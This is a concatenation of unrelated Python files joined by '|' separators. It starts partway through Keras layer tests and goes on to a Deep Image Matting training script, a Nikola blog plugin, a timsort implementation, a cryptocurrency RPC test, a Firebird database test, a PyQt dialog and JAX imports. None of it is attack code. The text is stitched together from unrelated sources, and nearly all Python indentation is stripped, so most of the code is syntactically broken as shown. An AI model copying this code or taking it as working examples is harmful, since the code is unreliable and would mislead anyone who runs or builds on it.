inputs = np.random.rand(num_samples, input_len_dim1, input_len_dim2,
input_len_dim3, stack_size)
# basic test
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.UpSampling3D,
kwargs={'size': (2, 2, 2),
'data_format': data_format},
input_shape=inputs.shape)
for length_dim1 in [2, 3]:
for length_dim2 in [2]:
for length_dim3 in [3]:
layer = keras.layers.UpSampling3D(
size=(length_dim1, length_dim2, length_dim3),
data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
if data_format == 'channels_first':
assert np_output.shape[2] == length_dim1 * input_len_dim1
assert np_output.shape[3] == length_dim2 * input_len_dim2
assert np_output.shape[4] == length_dim3 * input_len_dim3
else: # tf
assert np_output.shape[1] == length_dim1 * input_len_dim1
assert np_output.shape[2] == length_dim2 * input_len_dim2
assert np_output.shape[3] == length_dim3 * input_len_dim3
# compare with numpy
if data_format == 'channels_first':
expected_out = np.repeat(inputs, length_dim1, axis=2)
expected_out = np.repeat(expected_out, length_dim2, axis=3)
expected_out = np.repeat(expected_out, length_dim3, axis=4)
else: # tf
expected_out = np.repeat(inputs, length_dim1, axis=1)
expected_out = np.repeat(expected_out, length_dim2, axis=2)
expected_out = np.repeat(expected_out, length_dim3, axis=3)
np.testing.assert_allclose(np_output, expected_out)
@keras_parameterized.run_all_keras_modes
class CroppingTest(keras_parameterized.TestCase):
def test_cropping_1d(self):
num_samples = 2
time_length = 4
input_len_dim1 = 2
inputs = np.random.rand(num_samples, time_length, input_len_dim1)
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.Cropping1D,
kwargs={'cropping': (2, 2)},
input_shape=inputs.shape)
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.Cropping1D(cropping=(1, 1, 1))
with self.assertRaises(ValueError):
keras.layers.Cropping1D(cropping=None)
def test_cropping_2d(self):
num_samples = 2
stack_size = 2
input_len_dim1 = 9
input_len_dim2 = 9
cropping = ((2, 2), (3, 3))
for data_format in ['channels_first', 'channels_last']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_len_dim1,
input_len_dim2)
else:
inputs = np.random.rand(num_samples, input_len_dim1, input_len_dim2,
stack_size)
with self.cached_session(use_gpu=True):
# basic test
testing_utils.layer_test(
keras.layers.Cropping2D,
kwargs={'cropping': cropping,
'data_format': data_format},
input_shape=inputs.shape)
# correctness test
layer = keras.layers.Cropping2D(
cropping=cropping, data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
# compare with numpy
if data_format == 'channels_first':
expected_out = inputs[:, :, cropping[0][0]:-cropping[0][1], cropping[
1][0]:-cropping[1][1]]
else:
expected_out = inputs[:, cropping[0][0]:-cropping[0][1], cropping[1][
0]:-cropping[1][1], :]
np.testing.assert_allclose(np_output, expected_out)
for data_format in ['channels_first', 'channels_last']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_len_dim1,
input_len_dim2)
else:
inputs = np.random.rand(num_samples, input_len_dim1, input_len_dim2,
stack_size)
# another correctness test (no cropping)
with self.cached_session(use_gpu=True):
cropping = ((0, 0), (0, 0))
layer = keras.layers.Cropping2D(
cropping=cropping, data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
# compare with input
np.testing.assert_allclose(np_output, inputs)
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.Cropping2D(cropping=(1, 1, 1))
with self.assertRaises(ValueError):
keras.layers.Cropping2D(cropping=None)
def test_cropping_3d(self):
num_samples = 2
stack_size = 2
input_len_dim1 = 8
input_len_dim2 = 8
input_len_dim3 = 8
croppings = [((2, 2), (1, 1), (2, 3)), 3, (0, 1, 1)]
for cropping in croppings:
for data_format in ['channels_last', 'channels_first']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_len_dim1,
input_len_dim2, input_len_dim3)
else:
inputs = np.random.rand(num_samples, input_len_dim1, input_len_dim2,
input_len_dim3, stack_size)
# basic test
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.Cropping3D,
kwargs={'cropping': cropping,
'data_format': data_format},
input_shape=inputs.shape)
        if isinstance(cropping, tuple) and isinstance(cropping[0], tuple):
# correctness test
with self.cached_session(use_gpu=True):
layer = keras.layers.Cropping3D(
cropping=cropping, data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
# compare with numpy
if data_format == 'channels_first':
expected_out = inputs[:, :,
cropping[0][0]:-cropping[0][1],
cropping[1][0]:-cropping[1][1],
cropping[2][0]:-cropping[2][1]]
else:
expected_out = inputs[:,
cropping[0][0]:-cropping[0][1],
cropping[1][0]:-cropping[1][1],
cropping[2][0]:-cropping[2][1], :]
np.testing.assert_allclose(np_output, expected_out)
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.Cropping3D(cropping=(1, 1))
with self.assertRaises(ValueError):
keras.layers.Cropping3D(cropping=None)
@keras_parameterized.run_all_keras_modes
class DepthwiseConv2DTest(keras_parameterized.TestCase):
def _run_test(self, kwargs):
num_samples = 2
stack_size = 3
num_row = 7
num_col = 6
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.DepthwiseConv2D,
kwargs=kwargs,
input_shape=(num_samples, num_row, num_col, stack_size))
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'}),
('padding_same', {'padding': 'same'}),
('strides', {'strides': (2, 2)}),
# Only runs on GPU with CUDA, channels_first is not supported on CPU.
# TODO(b/62340061): Support channels_first on CPU.
('data_format', {'data_format': 'channels_first'}),
('depth_multiplier_1', {'depth_multiplier': 1}),
('depth_multiplier_2', {'depth_multiplier': 2}),
)
def test_depthwise_conv2d(self, kwargs):
kwargs['kernel_size'] = (3, 3)
if 'data_format' not in kwargs or test.is_gpu_available(cuda_only=True):
self._run_test(kwargs)
def test_depthwise_conv2d_full(self):
kwargs = {
'kernel_size': 3,
'padding': 'valid',
'data_format': 'channels_last',
'activation': None,
'depthwise_regularizer': 'l2',
'bias_regularizer': 'l2',
'activity_regularizer': 'l2',
'depthwise_constraint': 'unit_norm',
'use_bias': True,
'strides': (2, 2),
'depth_multiplier': 1,
}
self._run_test(kwargs)
if __name__ == '__main__':
test.main()
|
import argparse
import keras
import tensorflow as tf
from keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau
from keras.utils import multi_gpu_model
import migrate
from config import patience, batch_size, epochs, num_train_samples, num_valid_samples
from data_generator import train_gen, valid_gen
from model import build_encoder_decoder
from utils import overall_loss, get_available_cpus, get_available_gpus
if __name__ == '__main__':
# Parse arguments
ap = argparse.ArgumentParser()
ap.add_argument("-c", "--checkpoint", help="path to save checkpoint model files")
ap.add_argument("-p", "--pretrained", help="path to save pretrained model files")
args = vars(ap.parse_args())
checkpoint_path = args["checkpoint"]
pretrained_path = args["pretrained"]
# pretrained_path = 'models/vgg16_weights_tf_dim_ordering_tf_kernels.h5'
if checkpoint_path is None:
checkpoint_models_path = 'models/'
else:
# python train_encoder_decoder.py -c /mnt/Deep-Image-Matting/models/
checkpoint_models_path = '{}/'.format(checkpoint_path)
# Callbacks
tensor_board = keras.callbacks.TensorBoard(log_dir='./logs', histogram_freq=0, write_graph=True, write_images=True)
model_names = checkpoint_models_path + 'model.{epoch:02d}-{val_loss:.4f}.hdf5'
model_checkpoint = ModelCheckpoint(model_names, monitor='val_loss', verbose=1, save_best_only=True)
early_stop = EarlyStopping('val_loss', patience=patience)
reduce_lr = ReduceLROnPlateau('val_loss', factor=0.1, patience=int(patience / 4), verbose=1)
class MyCbk(keras.callbacks.Callback):
def __init__(self, model):
keras.callbacks.Callback.__init__(self)
self.model_to_save = model
def on_epoch_end(self, epoch, logs=None):
fmt = checkpoint_models_path + 'model.%02d-%.4f.hdf5'
self.model_to_save.save(fmt % (epoch, logs['val_loss']))
# Load our model, added support for Multi-GPUs
num_gpu = len(get_available_gpus())
if num_gpu >= 2:
with tf.device("/cpu:0"):
if pretrained_path is not None:
model = build_encoder_decoder()
model.load_weights(pretrained_path)
else:
model = build_encoder_decoder()
migrate.migrate_model(model)
new_model = multi_gpu_model(model, gpus=num_gpu)
# rewrite the callback: saving through the original model and not the multi-gpu model.
model_checkpoint = MyCbk(model)
else:
if pretrained_path is not None:
new_model = build_encoder_decoder()
new_model.load_weights(pretrained_path)
else:
new_model = build_encoder_decoder()
migrate.migrate_model(new_model)
# count = 0
# for i in new_model.layers:
# count += 1
# print(count)
# sgd = SGD(lr=1e-3, decay=1e-6, momentum=0.9, nesterov=True)
new_model.compile(optimizer='nadam', loss=overall_loss)
print(new_model.summary())
# Summarize then go!
num_cpu = get_available_cpus()
workers = int(round(num_cpu / 2))
print('num_gpu={}\nnum_cpu={}\nworkers={}\ntrained_models_path={}.'.format(num_gpu, num_cpu, workers,
checkpoint_models_path))
# Final callbacks
callbacks = [tensor_board, model_checkpoint, early_stop, reduce_lr]
# Start Fine-tuning
new_model.fit_generator(train_gen(),
steps_per_epoch=num_train_samples // batch_size,
validation_data=valid_gen(),
validation_steps=num_valid_samples // batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
use_multiprocessing=False,
workers=workers
)
|
# -*- coding: utf-8 -*-
# Copyright © 2016-2019, Chris Warrick.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Post scanner for package indexes."""
from __future__ import unicode_literals
import glob
import sys
import os
from nikola import utils
from nikola.post import Post
from nikola.plugin_categories import PostScanner
LOGGER = utils.get_logger('pkgindex_scan', utils.STDERR_HANDLER)
class PackageIndexScanner(PostScanner):
"""Scanner for package indexes."""
name = "pkgindex_scan"
def scan(self):
"""Scan posts in a package index."""
if 'PKGINDEX_CONFIG' not in self.site.config:
return []
config = self.site.config['PKGINDEX_CONFIG']
compiler = self.site.get_compiler('sample' + config['extension'])
if not self.site.quiet:
print("Scanning package index posts...", end='', file=sys.stderr)
timeline = []
self.site.pkgindex_entries = {}
self.site.pkgindex_by_name = {}
self.site.pkgindex_multiver = {}
for topdir, dirsettings in self.site.config['PKGINDEX_DIRS'].items():
destination, template_name = dirsettings
self.site.pkgindex_entries[topdir] = []
for pkgdir in glob.glob(topdir + "/*"):
if not os.path.isdir(pkgdir):
# Ignore non-directories
continue
post = Post(
os.path.join(pkgdir, 'README.md'),
self.site.config,
destination,
False,
self.site.MESSAGES,
template_name,
compiler
)
post.is_two_file = True
for d in post.meta.values():
d['is_special_entry'] = False
timeline.append(post)
self.site.pkgindex_entries[topdir].append(post)
self._update_name_multiver(post)
if 'special_entries' in config:
for source_path, destination, template_name, topdir in config['special_entries']:
post = Post(
source_path,
self.site.config,
destination,
False,
self.site.MESSAGES,
template_name,
compiler
)
post.is_two_file = True
for d in post.meta.values():
d['is_special_entry'] = True
timeline.append(post)
self.site.pkgindex_entries[topdir].append(post)
self._update_name_multiver(post)
# But wait, we need to change tags on multiver stuff!
# This is kinda... hacky...
maxver = config['versions_supported'][-1]
for versions in self.site.pkgindex_multiver.values():
versions = sorted(versions, key=lambda post: post.meta('dirver'))
v2p = {}
for post in versions:
dirver = post.meta('dirver')
for v in range(dirver, maxver + 1):
v2p[v] = post
p2v = {}
for v, p in v2p.items():
if p in p2v:
p2v[p].append(v)
else:
p2v[p] = [v]
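            # Illustrative example (comment added for clarity): with posts whose
            # dirver is 1 and 3 and maxver = 4, v2p becomes
            # {1: p1, 2: p1, 3: p3, 4: p3}, so p2v is {p1: [1, 2], p3: [3, 4]}
            # and each post is tagged below with exactly the versions it covers.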
for post, versions in p2v.items():
# And finally, update tags.
tags = post._tags[self.site.default_lang]
tags = [i for i in tags if not (i.startswith('v') and i[1:].isdigit())]
tags += ['v{0}'.format(i) for i in versions]
tags.append('multiver')
post._tags[self.site.default_lang] = tags
post.meta['en']['tags'] = tags
post.meta['en']['multiver'] = True
post.meta['en']['allver'] = versions
if not post.meta['en']['maxver'] and versions[-1] != maxver:
post.meta['en']['maxver'] = versions[-1]
# And generate self.site.pkgindex_by_version
self.site.pkgindex_by_version = {i: [] for i in config['versions_supported']}
for l in self.site.pkgindex_entries.values():
for post in l:
for version in post.meta['en']['allver']:
                    self.site.pkgindex_by_version[version].append(post)
return timeline
def supported_extensions(self):
"""Return a list of supported file extensions, or None if such a list isn't known beforehand."""
if 'PKGINDEX_CONFIG' not in self.site.config:
return None
return [self.site.config['PKGINDEX_CONFIG']['extension']]
def _update_name_multiver(self, post):
name = post.meta('slug')
if name in self.site.pkgindex_by_name:
self.site.pkgindex_by_name[name].append(post)
multiver = True
else:
self.site.pkgindex_by_name[name] = [post]
multiver = False
if multiver:
self.site.pkgindex_multiver[name] = self.site.pkgindex_by_name[name]
|
m=600
a=2
resultan_gaya=m*a
print(resultan_gaya)
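# Newton's second law: F = m * a ("resultan_gaya" is Indonesian for resultant
# force). Assuming SI units (m = 600 kg, a = 2 m/s^2), the script prints
# 600 * 2 = 1200, i.e. a resultant force of 1200 N.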
|
# ref. https://docs.python.org/3/library/random.html
from random import choice
if __name__ == "__main__":
num_seqs = range(20)
print('num_seqs', list(num_seqs))
print('choice(num_seqs)', choice(num_seqs))
print('choice(num_seqs)', choice(num_seqs))
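    # Note: random.choice works on any sequence that supports len() and integer
    # indexing, so passing a range object is fine; each call returns an int
    # drawn uniformly from 0..19, so the two prints above will usually (but not
    # always) differ.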
|
from typing import List
def insertionSort(array: List[int], start: int, end: int) -> None:
"""Main insertion sort algorithm\n
Sorts array in-place; returns None
"""
    for i in range(start + 1, end):  # Iterate through the run [start + 1, end)
comparator = array[i] # Make comparison with this value
section = i - 1
while (
section >= start and array[section] > comparator
        ):  # Walk backwards from i - 1 down to start
array[section + 1] = array[
section
] # If comparator <= array[section], move array[section] forward to make space
section -= 1
array[
section + 1
] = comparator # Insert comparator into the array, in its correct position
def merge(array: List[int], start: int, mid: int, end: int) -> None:
    """Merges the adjacent sorted runs array[start..mid] and array[mid+1..end] in place"""
start2 = mid + 1
if array[mid] <= array[start2]:
return
while start <= mid and start2 <= end:
if array[start] <= array[start2]:
start += 1
else:
value = array[start2]
index = start2
while index != start:
array[index] = array[index - 1]
index -= 1
array[start] = value
start += 1
mid += 1
start2 += 1
def timSort(array: List[int], run: int = 32) -> None:
"""Main timsort function\n
Sorts array in-place; returns None
"""
# Run insertionsort
for i in range(0, len(array), run):
insertionSort(array, i, min(i + run, len(array)))
# Run merges
size = run
while size < len(array):
for left in range(0, len(array), 2 * size):
mid = left + size - 1
right = min((left + 2 * size - 1), (len(array) - 1))
merge(array, left, mid, right)
size *= 2
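# A minimal usage sketch (the __main__ block below runs a larger demo on a
# shuffled 0..1000 sequence):
#
#     data = [5, 3, 8, 1, 9, 2]
#     timSort(data)
#     assert data == [1, 2, 3, 5, 8, 9]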
if __name__ == "__main__":
try:
from utils import randomSequence
except ModuleNotFoundError:
import os, sys # import shuffler from parent directory
dir_path = os.path.dirname(os.path.realpath(__file__))
parent_dir_path = os.path.abspath(os.path.join(dir_path, os.pardir))
sys.path.insert(0, parent_dir_path)
from utils import randomSequence
print("TIM SORT")
shuffledArray = randomSequence(0, 1000)
print(shuffledArray, "\n")
timSort(shuffledArray)
print(shuffledArray)
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test getblockstats rpc call
#
from test_framework.test_framework import FrancTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
import json
import os
import time
TESTSDIR = os.path.dirname(os.path.realpath(__file__))
class GetblockstatsTest(FrancTestFramework):
start_height = 101
max_stat_pos = 2
STATS_NEED_TXINDEX = [
'avgfee',
'avgfeerate',
'maxfee',
'maxfeerate',
'medianfee',
'feerate_percentiles',
'minfee',
'minfeerate',
'totalfee',
'utxo_size_inc',
]
def add_options(self, parser):
parser.add_argument('--gen-test-data', dest='gen_test_data',
default=False, action='store_true',
help='Generate test data')
parser.add_argument('--test-data', dest='test_data',
default='data/rpc_getblockstats.json',
action='store', metavar='FILE',
help='Test data file')
def set_test_params(self):
self.num_nodes = 2
self.extra_args = [['-txindex'], ['-paytxfee=0.003']]
self.setup_clean_chain = True
def get_stats(self):
return [self.nodes[0].getblockstats(hash_or_height=self.start_height + i) for i in range(self.max_stat_pos+1)]
def generate_test_data(self, filename):
mocktime = time.time()
self.nodes[0].generate(101)
self.nodes[0].sendtoaddress(address=self.nodes[1].getnewaddress(), amount=10, subtractfeefromamount=True)
self.nodes[0].generate(1)
self.sync_all()
self.nodes[0].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=10, subtractfeefromamount=True)
self.nodes[0].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=10, subtractfeefromamount=False)
self.nodes[1].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=1, subtractfeefromamount=True)
self.sync_all()
self.nodes[0].generate(1)
self.expected_stats = self.get_stats()
blocks = []
tip = self.nodes[0].getbestblockhash()
blockhash = None
height = 0
while tip != blockhash:
blockhash = self.nodes[0].getblockhash(height)
blocks.append(self.nodes[0].getblock(blockhash, 0))
height += 1
to_dump = {
'blocks': blocks,
'mocktime': int(mocktime),
'stats': self.expected_stats,
}
with open(filename, 'w', encoding="utf8") as f:
json.dump(to_dump, f, sort_keys=True, indent=2)
def load_test_data(self, filename):
with open(filename, 'r', encoding="utf8") as f:
d = json.load(f)
blocks = d['blocks']
mocktime = d['mocktime']
self.expected_stats = d['stats']
# Set the timestamps from the file so that the nodes can get out of Initial Block Download
self.nodes[0].setmocktime(mocktime)
self.nodes[1].setmocktime(mocktime)
for b in blocks:
self.nodes[0].submitblock(b)
def run_test(self):
test_data = os.path.join(TESTSDIR, self.options.test_data)
if self.options.gen_test_data:
self.generate_test_data(test_data)
else:
self.load_test_data(test_data)
self.sync_all()
stats = self.get_stats()
expected_stats_noindex = []
for stat_row in stats:
expected_stats_noindex.append({k: v for k, v in stat_row.items() if k not in self.STATS_NEED_TXINDEX})
# Make sure all valid statistics are included but nothing else is
expected_keys = self.expected_stats[0].keys()
assert_equal(set(stats[0].keys()), set(expected_keys))
assert_equal(stats[0]['height'], self.start_height)
assert_equal(stats[self.max_stat_pos]['height'], self.start_height + self.max_stat_pos)
for i in range(self.max_stat_pos+1):
self.log.info('Checking block %d\n' % (i))
assert_equal(stats[i], self.expected_stats[i])
# Check selecting block by hash too
blockhash = self.expected_stats[i]['blockhash']
stats_by_hash = self.nodes[0].getblockstats(hash_or_height=blockhash)
assert_equal(stats_by_hash, self.expected_stats[i])
# Check with the node that has no txindex
stats_no_txindex = self.nodes[1].getblockstats(hash_or_height=blockhash, stats=list(expected_stats_noindex[i].keys()))
assert_equal(stats_no_txindex, expected_stats_noindex[i])
# Make sure each stat can be queried on its own
for stat in expected_keys:
for i in range(self.max_stat_pos+1):
result = self.nodes[0].getblockstats(hash_or_height=self.start_height + i, stats=[stat])
assert_equal(list(result.keys()), [stat])
if result[stat] != self.expected_stats[i][stat]:
self.log.info('result[%s] (%d) failed, %r != %r' % (
stat, i, result[stat], self.expected_stats[i][stat]))
assert_equal(result[stat], self.expected_stats[i][stat])
# Make sure only the selected statistics are included (more than one)
some_stats = {'minfee', 'maxfee'}
stats = self.nodes[0].getblockstats(hash_or_height=1, stats=list(some_stats))
assert_equal(set(stats.keys()), some_stats)
# Test invalid parameters raise the proper json exceptions
tip = self.start_height + self.max_stat_pos
assert_raises_rpc_error(-8, 'Target block height %d after current tip %d' % (tip+1, tip),
self.nodes[0].getblockstats, hash_or_height=tip+1)
assert_raises_rpc_error(-8, 'Target block height %d is negative' % (-1),
self.nodes[0].getblockstats, hash_or_height=-1)
        # Make sure invalid stats aren't allowed
inv_sel_stat = 'asdfghjkl'
inv_stats = [
[inv_sel_stat],
['minfee' , inv_sel_stat],
[inv_sel_stat, 'minfee'],
['minfee', inv_sel_stat, 'maxfee'],
]
for inv_stat in inv_stats:
assert_raises_rpc_error(-8, 'Invalid selected statistic %s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=inv_stat)
# Make sure we aren't always returning inv_sel_stat as the culprit stat
assert_raises_rpc_error(-8, 'Invalid selected statistic aaa%s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=['minfee' , 'aaa%s' % inv_sel_stat])
assert_raises_rpc_error(-8, 'One or more of the selected stats requires -txindex enabled',
self.nodes[1].getblockstats, hash_or_height=self.start_height + self.max_stat_pos)
# Mainchain's genesis block shouldn't be found on regtest
assert_raises_rpc_error(-5, 'Block not found', self.nodes[0].getblockstats,
hash_or_height='000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f')
if __name__ == '__main__':
GetblockstatsTest().main()
|
#coding:utf-8
#
# id: bugs.core_4331
# title: LAG, LEAD and NTH_VALUE raise error when the second argument is NULL
# description:
# tracker_id: CORE-4331
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = []
init_script_1 = """"""
db_1 = db_factory(page_size=4096, sql_dialect=3, init=init_script_1)
test_script_1 = """
recreate table test(id int primary key, x int, y int);
commit;
insert into test values(101, 1, 10);
insert into test values(102, 2, 20);
insert into test values(103, 3, 30);
insert into test values(104, 4, 40);
insert into test values(105, 5, 50);
insert into test values(106, 6, 60);
insert into test values(107, 7, 70);
commit;
set list on;
select
id
,lag(x,null)over(order by id) x_lag
,lead(x,null)over(order by id) x_lead
,nth_value(x,null)over(order by id) x_nth
from test t
order by id;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
ID 101
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 102
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 103
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 104
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 105
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 106
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 107
X_LAG <null>
X_LEAD <null>
X_NTH <null>
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_stdout == act_1.clean_expected_stdout
|
# Module providing evasion attacks.
from reports.report_utility import ReportUtility
from reports.report_html import HtmlReport
from reports.report_ipynb import IpynbReport
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QAbstractTableModel, Qt
import pandas as pd
from pandas import DataFrame as DF
class table_view_model(QAbstractTableModel):
def __init__(self, data):
QAbstractTableModel.__init__(self)
self._data = data
def rowCount(self, parent=None):
return self._data.shape[0]
    def columnCount(self, parent=None):
return self._data.shape[1]
def data(self, index, role=Qt.DisplayRole):
if index.isValid():
if role == Qt.DisplayRole:
return str(self._data.iloc[index.row(), index.column()])
return None
def headerData(self, col, orientation, role):
if orientation == Qt.Horizontal and role == Qt.DisplayRole:
return self._data.columns[col]
return None
class Ui_Sheet_selector(object):
    '''Sheet selector takes the workbook name as input and allows the user to select the required sheet they are looking to add in the tool'''
def __init__(self,parent=None):
super(Ui_Sheet_selector,self).__init__()
self.File_name=""
self.Parent_window=parent
def setupUi(self, Sheet_selector):
self.Sheet_selector1=Sheet_selector
Sheet_selector.setObjectName("Sheet_selector")
Sheet_selector.resize(655, 300)
Sheet_selector.setMaximumSize(QtCore.QSize(655, 300))
self.groupBox = QtWidgets.QGroupBox(Sheet_selector)
self.groupBox.setGeometry(QtCore.QRect(0, 3, 651, 291))
self.groupBox.setObjectName("groupBox")
self.groupBox.setTitle("Select_the_sheet")
self.File_name_viewer = QtWidgets.QLineEdit(self.groupBox)
self.File_name_viewer.setGeometry(QtCore.QRect(10, 20, 521, 21))
self.File_name_viewer.setInputMask("")
self.File_name_viewer.setObjectName("File_name_viewer")
self.Excel_Data_Viewer = QtWidgets.QTableView(self.groupBox)
self.Excel_Data_Viewer.setGeometry(QtCore.QRect(10, 80, 635, 205))
#self.File_name_viewer.isEnabled(False)
self.Sheet_names_selector_combo = QtWidgets.QComboBox(self.groupBox)
self.Sheet_names_selector_combo.setGeometry(QtCore.QRect(10, 50, 521, 21))
self.Sheet_names_selector_combo.setObjectName("Sheet_names_selector_combo")
self.Sheet_names_selector_combo.currentTextChanged.connect(self.Show_the_few_data_in_data_table)
if self.Parent_window!=None:
self.File_name_viewer.setText(self.Parent_window.File_name)
self.File_name_viewer.setDisabled(True)
if len(self.Parent_window.New_excel_data.sheet_names)>0:
for sheet_name in self.Parent_window.New_excel_data.sheet_names:
self.Sheet_names_selector_combo.addItem(sheet_name)
self.Show_the_few_data_in_data_table()
self.Ok_buttion = QtWidgets.QPushButton(self.groupBox)
self.Ok_buttion.setGeometry(QtCore.QRect(540, 50, 75, 23))
self.Ok_buttion.clicked.connect(self.Create_the_data_frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Ok_buttion.sizePolicy().hasHeightForWidth())
self.Ok_buttion.setSizePolicy(sizePolicy)
self.Ok_buttion.setObjectName("Ok_buttion")
self.Ok_buttion.setText('Ok')
QtCore.QMetaObject.connectSlotsByName(Sheet_selector)
def Show_the_few_data_in_data_table(self):
        ''' Parses the currently selected workbook sheet into a DataFrame and displays it in the table view'''
if self.Sheet_names_selector_combo.currentText()!="":
sheetname=self.Parent_window.New_excel_data.parse(sheetname=self.Sheet_names_selector_combo.currentText())
self.modle=table_view_model(sheetname)
self.Excel_Data_Viewer.setModel(self.modle)
self.Excel_Data_Viewer.show()
def Create_the_data_frame(self):
        ''' Parses the selected sheet from the Excel file and registers it with the parent window's loaded data files'''
if self.Sheet_names_selector_combo.currentText()!="":
#self.Parent_window.Loaded=self.Parent_window.New_excel_data.parse(sheetname=self.Sheet_names_selector_combo.currentText())
self.Parent_window.Parent_window.Loaded_Data_File_count.append('File_'+str(len(self.Parent_window.Parent_window.Loaded_Data_File_count)+1))
self.New_File_Name=self.Parent_window.Parent_window.Loaded_Data_File_count[len(self.Parent_window.Parent_window.Loaded_Data_File_count)-1]
Temp_file=self.Parent_window.New_excel_data.parse(sheetname=self.Sheet_names_selector_combo.currentText())
# Converting the DF to Dict for use
Temp_file1={}
for name in Temp_file.columns: Temp_file1[name]=list(Temp_file[name])
self.Parent_window.Parent_window.Loaded_Data_Files[self.New_File_Name]={'Full_Rec_Summary':Temp_file1}
self.Parent_window.Parent_window.Loaded_Data_File_Raw_Data[self.New_File_Name]=DF(Temp_file1)
#self.Parent_window.Parent_window.Refresh_data_table_items()
self.Close_the_excel_sheet_selector()
def Close_the_excel_sheet_selector(self):
        ''' Closes the current Excel sheet selector window'''
self.Sheet_selector1.close()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Sheet_selector = QtWidgets.QDialog()
ui = Ui_Sheet_selector()
ui.setupUi(Sheet_selector)
Sheet_selector.show()
sys.exit(app.exec_())
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict, deque
import itertools as it
import operator as op
import re
from typing import (Any, Callable, Dict, List, Optional, Sequence, Set, Type,
Tuple, Union, NamedTuple)
from warnings import warn
import weakref
from absl import logging
import numpy as np
from ..config import config
from .. import core
from jax._src import ad_util
from jax._src import dtypes
from .. import linear_util as lu
from jax._src import source_info_util
from jax._src.abstract_arrays import (make_shaped_array, array_types)
from ..core import (ConcreteArray, ShapedArray, AbstractToken,
Literal, pp_eqn_compact, raise_to_shaped, abstract_token)
from ..errors import UnexpectedTracerError
from jax._src.pprint_util import pp
from .._src.util import (partial, partialmethod, cache, prod, unzip2,
extend_name_stack, wrap_name, safe_zip, safe_map)
from ..lib import xla_bridge as xb
from ..lib import xla_client as xc
from . import partial_eval as pe
from . import ad
from . import masking
map, unsafe_map = safe_map, map
zip, unsafe_zip = safe_zip, zip
xe = xc._xla
xops = xc._xla.ops
# Types
Backend = Any # xc.LocalBackend (why does mypy not like this?)
Device = Any # xc.Device
